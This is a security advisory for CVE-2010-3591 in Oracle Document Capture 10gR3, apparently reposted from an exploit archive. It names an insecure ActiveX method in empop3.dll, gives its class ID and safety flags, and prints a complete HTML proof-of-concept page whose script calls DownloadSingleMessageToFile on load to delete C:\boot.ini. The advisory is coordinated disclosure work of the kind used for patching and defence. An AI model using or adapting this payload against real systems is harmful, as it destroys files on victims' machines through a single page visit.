Exploit for windows platform in category remote exploits
Application: Oracle Document Capture
Versions Affected: Release 10gR3
Vendor URL: www.oracle.com
Bugs: insecure method, File overwriting, File deleting
Exploits: YES
Reported: 22.03.2010
Vendor response: 31.03.2010
Date of Public Advisory:24.01.2011
CVE-number: CVE-2010-3591
Author: Evdokimov Dmitriy from Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
***********
Oracle Document Capture contains ActiveX components that contains insecure methods in empop3.dll
Details
*******
Oracle Document Capture contains ActiveX component EMPOP3Lib (empop3.dll) Lib GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
which is contains insecure method "DownloadSingleMessageToFile" that can delete any file in system.
Class EasyMailPop3
GUID: {F647CBE5-3C01-402A-B3F0-502A77054A24}
Number of Interfaces: 1
Default Interface: IPOP3Main
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
Details
*******
Attacker can construct html page which call vulnerable function "DownloadSingleMessageToFile" from ActiveX component empop3.dll
Example:
<HTML>
<HEAD>
<TITLE>DSecRG</TITLE>
</HEAD>
<BODY>
<OBJECT id='eds' classid='clsid:F647CBE5-3C01-402A-B3F0-502A77054A24'></OBJECT>
<SCRIPT>
function Exploit(){
eds.DownloadSingleMessageToFile(1,"C:\\boot.ini",1);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
References
**********
http://dsecrg.com/pages/vul/show.php?id=305
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
# 0day.today [2018-01-10] #